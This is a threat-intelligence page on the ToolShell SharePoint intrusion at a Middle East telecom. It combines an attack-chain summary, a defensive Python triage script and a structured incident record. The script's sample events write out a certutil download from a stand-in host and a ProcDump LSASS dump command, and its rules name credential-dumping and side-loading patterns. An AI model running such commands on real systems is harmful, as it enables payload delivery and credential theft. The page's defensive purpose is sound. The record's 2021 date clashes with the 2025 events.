Telecommunications service provider in the Middle East

A telecommunications service provider in the Middle East was compromised through the ToolShell vulnerability (CVE-2025-53770) in on-premises Microsoft SharePoint. The intrusion is attributed to China-linked threat actors; Salt Typhoon is among the groups named in connection with it. The activity on the telecom's network began on July 21 with the deployment of webshells on the exposed SharePoint server for persistent access.

From that foothold the attackers used DLL side-loading to install the Go-based Zingdoor backdoor, followed by the ShadowPad Trojan, the Rust-based KrustyLoader and the Sliver post-exploitation framework. The side-loading hosts were legitimate, signed executables from security vendors (Trend Micro, BitDefender), chosen so that the malicious DLL runs inside a trusted process and blends in with endpoint security activity. Credentials were harvested by dumping LSASS memory with ProcDump, Minidump and LsassDumper, and the PetitPotam NTLM relay flaw (CVE-2021-36942) was exploited to escalate to domain compromise. Living-off-the-land and dual-use tools rounded out the chain: Certutil for downloading and decoding payloads, GoGo Scanner for internal network discovery ahead of lateral movement, and Revsocks for reverse SOCKS tunnelling and data exfiltration.

Given the provider's role in regional communications infrastructure, the likely consequences are unauthorized access to sensitive corporate and customer data, operational disruption, and an ongoing espionage risk. The combination of a zero-day in a public-facing application, trusted vendor binaries as side-loading hosts, and built-in Windows utilities for the later stages is what let the operation stay below the threshold of conventional signature-based detection.
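The attack chain above (webshell on the IIS worker process, Certutil downloads, DLL side-loading through a signed vendor binary, LSASS dumping) is detectable from ordinary endpoint telemetry even when every binary involved is legitimate. The Python below is an added example written for this page; it is not code from Symantec, Microsoft, or any affected organisation. It assumes a Sysmon-like event format (one JSON object per line with host, time, image, parent_image, command_line and an optional loaded_image field), and the sample events, hostnames, paths, the vendor_signed.exe file name and the 198.51.100.7 address are constructed for illustration. The side-loadable DLL name list is a general heuristic, not an indicator list from this incident.

```python
"""
Triage of Windows process-creation / image-load events for ToolShell-style
post-exploitation stages.  Added example, not code from the original page.

Assumed event format (loosely mirrors Sysmon EventID 1 and 7), one JSON per line:
  host, time (ISO-8601), image, parent_image, command_line, loaded_image (optional)
"""
import json
import ntpath
from dataclasses import dataclass

WEB_WORKERS = {"w3wp.exe"}                      # IIS worker that hosts SharePoint
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Windows DLL names commonly hijacked for side-loading (assumption, generic heuristic).
SIDELOAD_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll", "userenv.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# Constructed sample telemetry; not real logs from the incident.
SAMPLE_EVENTS = r"""
{"host":"sp01","time":"2025-07-21T03:12:05Z","image":"C:\\Windows\\System32\\cmd.exe","parent_image":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","command_line":"cmd.exe /c whoami"}
{"host":"sp01","time":"2025-07-21T03:12:40Z","image":"C:\\Windows\\System32\\certutil.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"certutil.exe -urlcache -split -f http://198.51.100.7/update.bin C:\\ProgramData\\update.bin"}
{"host":"sp01","time":"2025-07-21T03:15:11Z","image":"C:\\ProgramData\\av\\vendor_signed.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"vendor_signed.exe","loaded_image":"C:\\ProgramData\\av\\version.dll"}
{"host":"sp01","time":"2025-07-21T03:20:33Z","image":"C:\\ProgramData\\procdump64.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"procdump64.exe -accepteula -ma lsass.exe C:\\ProgramData\\l.dmp"}
{"host":"sp01","time":"2025-07-21T03:25:00Z","image":"C:\\Windows\\System32\\svchost.exe","parent_image":"C:\\Windows\\System32\\services.exe","command_line":"svchost.exe -k netsvcs"}
"""


@dataclass(frozen=True)
class Finding:
    host: str
    time: str
    rule: str
    detail: str


def _base(path: str) -> str:
    # ntpath handles backslash paths regardless of the platform the triage runs on.
    return ntpath.basename(path).lower()


def _check(ev: dict):
    """Return (rule, detail) for the first matching stage, or None."""
    image = _base(ev.get("image", ""))
    parent = _base(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "").lower()

    # Stage 1: webshell.  The IIS worker process has no business spawning a shell.
    if parent in WEB_WORKERS and image in SHELLS:
        return "webshell_shell_spawn", f"{parent} -> {image}: {cmd}"

    # Stage 2: living-off-the-land download/decode via certutil.
    if image == "certutil.exe" and any(f in cmd for f in ("-urlcache", "-decode", "-decodehex")):
        return "certutil_lolbin", cmd

    # Stage 3: credential theft.  Any tool outside the Windows system directories
    # that names lsass on its command line (ProcDump, Minidump-style dumpers, ...).
    if "lsass" in cmd and not ev.get("image", "").lower().startswith(SYSTEM_DIRS):
        return "lsass_dump", cmd

    # Stage 4: DLL side-loading.  A hijackable system DLL name loaded from a
    # non-system path, typically next to a signed but relocated vendor binary.
    dll = ev.get("loaded_image", "")
    if dll and _base(dll) in SIDELOAD_DLLS and not dll.lower().startswith(SYSTEM_DIRS):
        return "dll_sideload", f"{image} loaded {dll}"

    return None


def triage(lines: str) -> list:
    """Run the stage checks over newline-delimited JSON events."""
    findings = []
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        hit = _check(ev)
        if hit:
            findings.append(Finding(ev["host"], ev["time"], hit[0], hit[1]))
    return findings


def attack_chain(findings: list) -> dict:
    """Per host, the time-ordered list of detected stages (ISO-8601 sorts lexically)."""
    chains: dict = {}
    for f in sorted(findings, key=lambda f: (f.host, f.time)):
        chains.setdefault(f.host, []).append(f.rule)
    return chains


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.time} {f.host} {f.rule}: {f.detail}")
    print(attack_chain(found))
```

The single benign svchost event produces no finding, while the four malicious events reconstruct the sequence webshell, download, side-load, LSASS dump on one host. In production the same checks belong in the SIEM or EDR rule engine rather than a script, but the point holds: none of the rules depend on a hash of Zingdoor or ShadowPad, only on behaviour that a SharePoint front end should never exhibit.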

Source: https://www.bleepingcomputer.com/news/security/sharepoint-toolshell-attacks-targeted-orgs-across-four-continents/

TPRM report: https://www.rankiteo.com/company/du

"id": "du3432434102225",
"linkid": "du",
"type": "Cyber Attack",
"date": "6/2021",
"severity": "100",
"impact": "6",
"explanation": "Attack threatening the economy of geographical region"
{'affected_entities': [{'industry': 'Telecommunications',
                        'location': 'Middle East',
                        'name': 'Unnamed Telecommunications Service Provider',
                        'type': 'Private Sector'},
                       {'industry': 'Public Administration',
                        'location': 'Africa',
                        'name': 'Two Unnamed Government Departments',
                        'type': 'Government'},
                       {'industry': 'Public Administration',
                        'location': 'South America',
                        'name': 'Two Unnamed Government Agencies',
                        'type': 'Government'},
                       {'industry': 'Education',
                        'location': 'United States',
                        'name': 'Unnamed University',
                        'type': 'Educational Institution'},
                       {'industry': 'Technology/IT',
                        'location': 'Africa',
                        'name': 'Unnamed State Technology Agency',
                        'type': 'Government'},
                       {'industry': 'Public Administration',
                        'location': 'Middle East',
                        'name': 'Unnamed Government Department',
                        'type': 'Government'},
                       {'industry': 'Financial Services',
                        'location': 'Europe',
                        'name': 'Unnamed Finance Company',
                        'type': 'Private Sector'}],
 'attack_vector': ['Exploitation of Public-Facing Application (CVE-2025-53770)',
                   'Webshell Deployment',
                   'DLL Side-Loading',
                   'Living-off-the-Land Tools'],
 'customer_advisories': ['Patch Immediately',
                         'Monitor for Indicators of Compromise (IoCs)'],
 'data_breach': {'data_exfiltration': ['Likely (via Revsocks Utility)'],
                 'personally_identifiable_information': ['Potential (via '
                                                         'Credential Theft)'],
                 'sensitivity_of_data': ['High (Government/Telecom/Finance '
                                         'Sectors)'],
                 'type_of_data_compromised': ['System Information',
                                              'Credentials (via Lsass Dumping)',
                                              'Potential Sensitive Files']},
 'date_detected': '2025-07-20',
 'date_publicly_disclosed': '2025-07-20',
 'description': 'Hackers believed to be associated with China exploited the '
                'ToolShell vulnerability (CVE-2025-53770) in Microsoft '
                'SharePoint, targeting government agencies, universities, '
                'telecommunication providers, and finance organizations. The '
                'flaw, a bypass for CVE-2025-49706 and CVE-2025-49704, allows '
                'remote code execution and full file system access without '
                'authentication. Microsoft released emergency updates on July '
                '21 after the zero-day was disclosed on July 20. The attacks '
                'involved multiple Chinese threat groups (Budworm/Linen '
                'Typhoon, Sheathminer/Violet Typhoon, Storm-2603/Warlock, and '
                'Salt Typhoon), deploying webshells, backdoors (Zingdoor, '
                'ShadowPad), and post-exploitation tools (KrustyLoader, '
                'Sliver). Credential dumping and domain compromise (via '
                'PetitPotam) were also observed, alongside living-off-the-land '
                'tools like Certutil, GoGo Scanner, and Revsocks.',
 'impact': {'brand_reputation_impact': ['Potential Reputation Damage for '
                                        'Affected Organizations',
                                        'Trust Erosion in Government/Telecom '
                                        'Sectors'],
            'data_compromised': True,
            'identity_theft_risk': ['High (Credential Dumping via ProcDump, '
                                    'Minidump, LsassDumper)'],
            'operational_impact': ['Persistent Access via Webshells',
                                   'Credential Theft',
                                   'Lateral Movement',
                                   'Post-Exploitation (Sliver Framework)'],
            'systems_affected': ['Microsoft SharePoint Servers (On-Premise)',
                                 'Domain Controllers (via PetitPotam)',
                                 'Compromised Endpoints']},
 'initial_access_broker': {'backdoors_established': ['Zingdoor (Go-based)',
                                                     'ShadowPad Trojan',
                                                     'KrustyLoader '
                                                     '(Rust-based)'],
                           'entry_point': 'CVE-2025-53770 (ToolShell) in '
                                          'Microsoft SharePoint',
                           'high_value_targets': ['Government Agencies',
                                                  'Telecom Providers',
                                                  'Financial Institutions',
                                                  'Universities']},
 'investigation_status': 'Ongoing (Symantec and Microsoft)',
 'lessons_learned': ['Zero-day vulnerabilities in widely used software (e.g., '
                     'SharePoint) are prime targets for state-sponsored '
                     'actors.',
                     'Living-off-the-land tools (e.g., Certutil) and '
                     'legitimate executables (Trend Micro, BitDefender) can '
                     'bypass traditional defenses.',
                     'Credential dumping remains a critical post-exploitation '
                     'step for lateral movement.',
                     'Patch management urgency is critical for zero-days with '
                     'public exploitation.'],
 'motivation': ['Espionage', 'Data Theft', 'Persistent Access'],
 'post_incident_analysis': {'corrective_actions': ['Accelerate patch '
                                                   'deployment timelines for '
                                                   'critical vulnerabilities.',
                                                   'Deploy behavioral-based '
                                                   'detection for '
                                                   'post-exploitation tools '
                                                   '(e.g., Sliver).',
                                                   'Implement stricter '
                                                   'controls on '
                                                   'living-off-the-land tool '
                                                   'usage.',
                                                   'Enhance threat '
                                                   'intelligence sharing for '
                                                   'Chinese APT groups.'],
                            'root_causes': ['Unpatched zero-day vulnerability '
                                            '(CVE-2025-53770) in on-premise '
                                            'SharePoint servers.',
                                            'Insufficient detection for '
                                            'webshell deployment and DLL '
                                            'side-loading.',
                                            'Over-reliance on perimeter '
                                            'defenses without behavioral '
                                            'monitoring for '
                                            'post-exploitation.']},
 'ransomware': {'data_exfiltration': ['Possible (via KrustyLoader/Sliver)'],
                'ransomware_strain': ['Warlock (associated with Storm-2603)']},
 'recommendations': ['Immediate patching of CVE-2025-53770 and related flaws '
                     '(CVE-2025-49706, CVE-2025-49704).',
                     'Monitor for webshell activity and unusual DLL '
                     'side-loading patterns.',
                     'Restrict use of living-off-the-land tools (e.g., '
                     'Certutil) via application whitelisting.',
                     'Enhance detection for post-exploitation frameworks '
                     '(e.g., Sliver).',
                     'Conduct thorough credential audits and rotations '
                     'post-breach.',
                     'Segment networks to limit lateral movement from '
                     'SharePoint servers.'],
 'references': [{'source': 'Symantec (Broadcom) Report'},
                {'source': 'Microsoft Security Advisory (CVE-2025-53770)'},
                {'source': 'Viettel Cyber Security (Pwn2Own Berlin '
                           'Demonstration)'}],
 'regulatory_compliance': {'regulatory_notifications': ['Potential '
                                                        'Notifications to '
                                                        'Sector-Specific '
                                                        'Regulators (e.g., '
                                                        'Telecom, Finance)']},
 'response': {'communication_strategy': ['Symantec Public Report',
                                         'Microsoft Security Advisory'],
              'containment_measures': ['Microsoft Emergency Patches (July 21)',
                                       'Webshell Detection/Removal'],
              'enhanced_monitoring': ['Detection of DLL Side-Loading',
                                      'Sliver Framework Activity'],
              'incident_response_plan_activated': True,
              'remediation_measures': ['Patch Management for CVE-2025-53770',
                                       'Credential Rotation',
                                       'Backdoor Removal (Zingdoor, '
                                       'ShadowPad)'],
              'third_party_assistance': ['Symantec (Broadcom)', 'Microsoft']},
 'stakeholder_advisories': ['Microsoft Security Updates',
                            'Symantec Threat Intelligence Report'],
 'threat_actor': ['Budworm (Linen Typhoon)',
                  'Sheathminer (Violet Typhoon)',
                  'Storm-2603 (Warlock Ransomware)',
                  'Salt Typhoon'],
 'title': 'Exploitation of ToolShell Vulnerability (CVE-2025-53770) in '
          'Microsoft SharePoint by Chinese Threat Actors',
 'type': ['Cyber Espionage',
          'Unauthorized Access',
          'Data Exfiltration',
          'Credential Theft'],
 'vulnerability_exploited': ['CVE-2025-53770 (ToolShell)',
                             'CVE-2021-36942 (PetitPotam)']}